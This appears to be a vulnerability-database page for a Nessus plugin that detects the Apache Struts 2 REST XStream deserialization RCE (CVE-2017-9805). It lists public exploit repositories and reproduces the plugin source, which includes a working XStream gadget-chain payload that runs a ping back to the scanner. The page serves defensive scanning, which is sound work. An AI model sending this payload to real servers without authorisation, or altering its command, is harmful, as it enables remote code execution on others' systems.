Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE - Nessus

High   Plugin ID: 102977

This page contains detailed information about the Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 102977
Name: Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE
Filename: struts_2_5_13_rest_rce.nasl
Vulnerability Published: 2017-09-05
This Plugin Published: 2017-09-06
Last Modification Time: 2022-04-11
Plugin Version: 1.21
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: http_version.nasl, os_fingerprint.nasl, webmirror.nasl
Excluded KB Items [?]: Settings/disable_cgi_scanning

Vulnerability Information


Severity: High
Vulnerability Published: 2017-09-05
Patch Published: 2017-09-05
CVE [?]: CVE-2017-9805
CPE [?]: cpe:/a:apache:struts
Exploited by Malware: True

Synopsis

The remote web server contains a web application that uses a Java framework that is affected by a remote code execution vulnerability.

Description

The remote web application appears to use the Apache Struts 2 web framework. A remote code execution vulnerability exists in the REST plugin, which uses XStreamHandler to insecurely deserialize user-supplied input in XML requests. An unauthenticated, remote attacker can exploit this, via a specially crafted XML request, to execute arbitrary code.

Note that this plugin only reports the first vulnerable instance of a Struts 2 application.

Solution

Upgrade to Apache Struts version 2.3.34 or 2.5.13 or later.

Public Exploits


Target Network Port(s): 80, 8080
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Core Impact, D2 Elliot)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE vulnerability:

  1. Metasploit: exploit/multi/http/struts2_rest_xstream
    [Apache Struts 2 REST Plugin XStream RCE]
  2. Exploit-DB: exploits/linux/remote/42627.py
    [EDB-42627: Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution]
  3. GitHub: https://github.com/0day666/Vulnerability-verification
    [CVE-2017-9805]
  4. GitHub: https://github.com/0xd3vil/CVE-2017-9805-Exploit
    [CVE-2017-9805: CVE-2017-9805-Exploit]
  5. GitHub: https://github.com/3vikram/Application-Vulnerabilities-Payloads
    [CVE-2017-9805]
  6. GitHub: https://github.com/84KaliPleXon3/Payloads_All_The_Things
    [CVE-2017-9805]
  7. GitHub: https://github.com/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378
    [CVE-2017-9805]
  8. GitHub: https://github.com/Cyberleet1337/Payloadswebhack
    [CVE-2017-9805]
  9. GitHub: https://github.com/Delishsploits/PayloadsAndMethodology
    [CVE-2017-9805]
  10. GitHub: https://github.com/DynamicDesignz/Alien-Framework
    [CVE-2017-9805]
  11. GitHub: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
    [CVE-2017-9805]
  12. GitHub: https://github.com/GuynnR/Payloads
    [CVE-2017-9805]
  13. GitHub: https://github.com/Jean-Francois-C/Boot2root-CTFs-Writeups
    [CVE-2017-9805]
  14. GitHub: https://github.com/Jean-Francois-C/Windows-Penetration-Testing
    [CVE-2017-9805]
  15. GitHub: https://github.com/LearnGolang/LearnGolang
    [CVE-2017-9805]
  16. GitHub: https://github.com/Muhammd/Awesome-Payloads
    [CVE-2017-9805]
  17. GitHub: https://github.com/Prodject/Kn0ck
    [CVE-2017-9805]
  18. GitHub: https://github.com/SexyBeast233/SecBooks
    [CVE-2017-9805]
  19. GitHub: https://github.com/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit
    [CVE-2017-9805: A script to Fuzz and and exploit Apache struts CVE-2017-9805]
  20. GitHub: https://github.com/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-
    [CVE-2017-9805: Simple python script to fuzz site for CVE-2017-9805]
  21. GitHub: https://github.com/Vancir/s2-052-reproducing
    [CVE-2017-9805]
  22. GitHub: https://github.com/XPR1M3/Payloads_All_The_Things
    [CVE-2017-9805]
  23. GitHub: https://github.com/ZarvisD/Struts2_rce_XStream_Plugin
    [CVE-2017-9805]
  24. GitHub: https://github.com/albinowax/ActiveScanPlusPlus
    [CVE-2017-9805]
  25. GitHub: https://github.com/andrysec/PayloadsAllVulnerability
    [CVE-2017-9805]
  26. GitHub: https://github.com/anhtu97/PayloadAllEverything
    [CVE-2017-9805]
  27. GitHub: https://github.com/apkadmin/PayLoadsAll
    [CVE-2017-9805]
  28. GitHub: https://github.com/chanchalpatra/payload
    [CVE-2017-9805]
  29. GitHub: https://github.com/cyjaysun/S2-052
    [CVE-2017-9805]
  30. GitHub: https://github.com/digitalencoding/HHC2017
    [CVE-2017-9805]
  31. GitHub: https://github.com/freddyfernando/News
    [CVE-2017-9805]
  32. GitHub: https://github.com/hktalent/myhktools
    [CVE-2017-9805]
  33. GitHub: https://github.com/jongmartinez/-CVE-2017-9805-
    [CVE-2017-9805: Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)]
  34. GitHub: https://github.com/khodges42/Etrata
    [CVE-2017-9805]
  35. GitHub: https://github.com/kk98kk0/Payloads
    [CVE-2017-9805]
  36. GitHub: https://github.com/koutto/jok3r-pocs
    [CVE-2017-9805]
  37. GitHub: https://github.com/mrhacker51/ReverseShellCommands
    [CVE-2017-9805]
  38. GitHub: https://github.com/oneplus-x/Sn1per
    [CVE-2017-9805]
  39. GitHub: https://github.com/ozkanbilge/Payloads
    [CVE-2017-9805]
  40. GitHub: https://github.com/qazbnm456/awesome-cve-poc/blob/master/CVE-2017-9805.md
    [CVE-2017-9805]
  41. GitHub: https://github.com/rvermeulen/apache-struts-cve-2017-9805
    [CVE-2017-9805]
  42. GitHub: https://github.com/s1kr10s/Apache-Struts-v4
    [CVE-2017-9805]
  43. GitHub: https://github.com/samba234/Sniper
    [CVE-2017-9805]
  44. GitHub: https://github.com/sobinge/PayloadsAllThesobinge
    [CVE-2017-9805]
  45. GitHub: https://github.com/sobinge/--1
    [CVE-2017-9805]
  46. GitHub: https://github.com/sujithvaddi/apache_struts_cve_2017_9805
    [CVE-2017-9805]
  47. GitHub: https://github.com/tdcoming/Vulnerability-engine
    [CVE-2017-9805]
  48. GitHub: https://github.com/unusualwork/Sn1per
    [CVE-2017-9805]
  49. GitHub: https://github.com/vitapluvia/hhc-writeup-2017
    [CVE-2017-9805]
  50. GitHub: https://github.com/whoadmin/pocs
    [CVE-2017-9805]
  51. GitHub: https://github.com/wifido/CVE-2017-9805-Exploit
    [CVE-2017-9805: Struts 2.5 - 2.5.12 REST Plugin XStream RCE]
  52. GitHub: https://github.com/woods-sega/woodswiki
    [CVE-2017-9805]
  53. GitHub: https://github.com/0x00-0x00/-CVE-2017-9805
    [CVE-2017-9805: Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)]
  54. GitHub: https://github.com/BeyondCy/S2-052
    [CVE-2017-9805: CVE-2017-9805 - Exploit]
  55. GitHub: https://github.com/chrisjd20/cve-2017-9805.py
    [CVE-2017-9805: Better Exploit Code For CVE 2017 9805 apache struts]
  56. GitHub: https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
    [CVE-2017-9805: An exploit for Apache Struts CVE-2017-9805]
  57. GitHub: https://github.com/luc10/struts-rce-cve-2017-9805
    [CVE-2017-9805: CVE 2017-9805]
  58. GitHub: https://github.com/mazen160/struts-pwn_CVE-2017-9805
    [CVE-2017-9805: An exploit for Apache Struts CVE-2017-9805]
  59. GitHub: https://github.com/z3bd/CVE-2017-9805
    [CVE-2017-9805: Struts2-rest-showcase 2.5.10]
  60. GitHub: https://github.com/hahwul/struts2-rce-cve-2017-9805-ruby
    [CVE-2017-9805: Cve -2017-9805]
  61. D2 Elliot: apache_struts_rest_plugin_xstream_rce.html
    [Apache Struts REST Plugin XStream RCE]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2017-9805
CVSS V2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P/E:H/RL:OF/RC:C
CVSS Base Score:6.8 (Medium)
Impact Subscore:6.4
Exploitability Subscore:8.6
CVSS Temporal Score:5.9 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.9 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
CVSS Base Score:8.1 (High)
Impact Subscore:5.9
Exploitability Subscore:2.2
CVSS Temporal Score:7.7 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:7.7 (High)

Go back to menu.

Plugin Source


This is the struts_2_5_13_rest_rce.nasl nessus plugin source code. This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(102977);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2017-9805");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");

  script_name(english:"Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a web application that uses a Java
framework that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web application appears to use the Apache Struts 2 web
framework. A remote code execution vulnerability exists in the REST
plugin, which uses XStreamHandler to insecurely deserialize
user-supplied input in XML requests. An unauthenticated, remote
attacker can exploit this, via a specially crafted XML request, to
execute arbitrary code.

Note that this plugin only reports the first vulnerable instance of a
Struts 2 application.");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-052");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13");
  script_set_attribute(attribute:"see_also", value:"https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement");
  script_set_attribute(attribute:"see_also", value:"https://lgtm.com/blog/apache_struts_CVE-2017-9805");
  script_set_attribute(attribute:"see_also", value:"https://github.com/jas502n/St2-052");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Struts version 2.3.34 or 2.5.13 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-9805");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Apache Struts REST Plugin XStream RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts 2 REST Plugin XStream RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/09/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/09/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/09/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "webmirror.nasl", "os_fingerprint.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("http.inc");
include("torture_cgi.inc");
include("url_func.inc");

port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list();
# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match4 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match4))
    {
      urls = make_list(urls, match4[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}

if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

# Always check web root
urls = make_list(urls, "/");

# Struts is slow
timeout = get_read_timeout() * 2;
if(timeout < 10)
  timeout = 10;

urls = list_uniq(urls);
scanner_ip = compat::this_host();
target_ip = get_host_ip();
vuln = FALSE;

ua = get_kb_item("global_settings/http_user_agent");
if (empty_or_null(ua))
  ua = 'Nessus';

pat = hexstr(rand_str(length:10));

os = get_kb_item("Host/OS");
if (!empty_or_null(os) && "windows" >< tolower(os))
{
  ping_cmd = 'ping</string><string>-n</string><string>3</string><string>-l</string><string>500</string><string>' + scanner_ip;
  filter = "icmp and icmp[0] = 8 and src host " + target_ip + " and greater 500";
}
else
{
  ping_cmd = "ping</string><string>-c</string><string>3</string><string>-p</string><string>" + pat + "</string><string>" + scanner_ip;
  filter = "icmp and icmp[0] = 8 and src host " + target_ip;
}

foreach url (urls)
{
  soc = open_sock_tcp(port);
  if (!soc) audit(AUDIT_SOCK_FAIL, port);

  post_payload = '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string>' +
  ping_cmd +
  '</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>';

  attack_url = url;

  req =
    'POST ' + attack_url + ' HTTP/1.1\n' +
    'Host: ' + target_ip + ':' + port + '\n' +
    'User-Agent: ' + ua + '\n' +
    'Accept-Language: en-US\n' +
    'Content-Type: application/xml\n' +
    'Content-Length: ' + strlen(post_payload) + '\n' +
    'Connection: Keep-Alive\n' +
    '\n' + post_payload;

  s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);
  icmp = tolower(hexstr(get_icmp_element(icmp:s,element:"data")));
  close(soc);

  if ("windows" >< tolower(os) && !isnull(icmp))
  {
    vuln = TRUE;
    vuln_url = req;
    report =
      '\nNessus confirmed this issue by examining ICMP traffic. '+
      'Below is the response :' +
      '\n\n' + snip +
      '\n' + icmp +
      '\n' + snip +
      '\n';
    break;
  }
  else if (pat >< icmp)
  {
    vuln = TRUE;
    vuln_url = req;
    report =
      '\nNessus confirmed this issue by examining ICMP traffic and looking for'+
      '\nthe pattern sent in our packet (' + pat + '). Below is the response :'+
      '\n\n' + snip +
      '\n' + icmp +
      '\n' + snip +
      '\n';
    break;
  }

  # Stop after first vulnerable Struts app is found
  if (vuln) break;
}

if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');

security_report_v4(
  port       : port,
  severity   : SECURITY_WARNING,
  generic    : TRUE,
  request    : make_list(vuln_url),
  output     : report
);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/struts_2_5_13_rest_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\struts_2_5_13_rest_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/struts_2_5_13_rest_rce.nasl

Go back to menu.

How to Run


Here is how to run the Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE plugin ID 102977.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl struts_2_5_13_rest_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a struts_2_5_13_rest_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - struts_2_5_13_rest_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state struts_2_5_13_rest_rce.nasl -t <IP/HOST>

Go back to menu.

References


See also: Similar and related Nessus plugins:
  • 103663 - Oracle WebLogic Server Multiple Vulnerabilities
  • 102960 - Apache Struts 2.1.x >= 2.1.2 / 2.2.x / 2.3.x < 2.3.34 / 2.5.x < 2.5.13 Multiple Vulnerabilities (S2-050 - S2-053)
  • 66935 - Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution
  • 66931 - Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution
  • 68981 - Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution
  • 70168 - Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass
  • 73203 - Apache Struts 2 'class' Parameter ClassLoader Manipulation
  • 119728 - Apache Struts 2 'method:' Prefix Arbitrary Remote Command Execution
  • 90152 - Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE
  • 91811 - Apache Struts 2 REST Plugin OGNL Expression Handling RCE
  • 102918 - Apache Struts 2.3.x Struts 1 plugin RCE (remote)
  • 97610 - Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
  • 112064 - Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)
  • 144365 - Apache Struts 2.x < 2.5.26 RCE (S2-061) (direct check)
  • 69240 - Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution
  • 57691 - Apache Struts 2 Multiple Remote Code Execution and File Overwrite Vulnerabilities (safe check) (deprecated)
  • 57850 - Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
  • 47900 - Apache Struts 2 / XWork Remote Code Execution (safe check)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file struts_2_5_13_rest_rce.nasl version 1.21. For more plugins, visit the Nessus Plugin Library.

Go back to menu.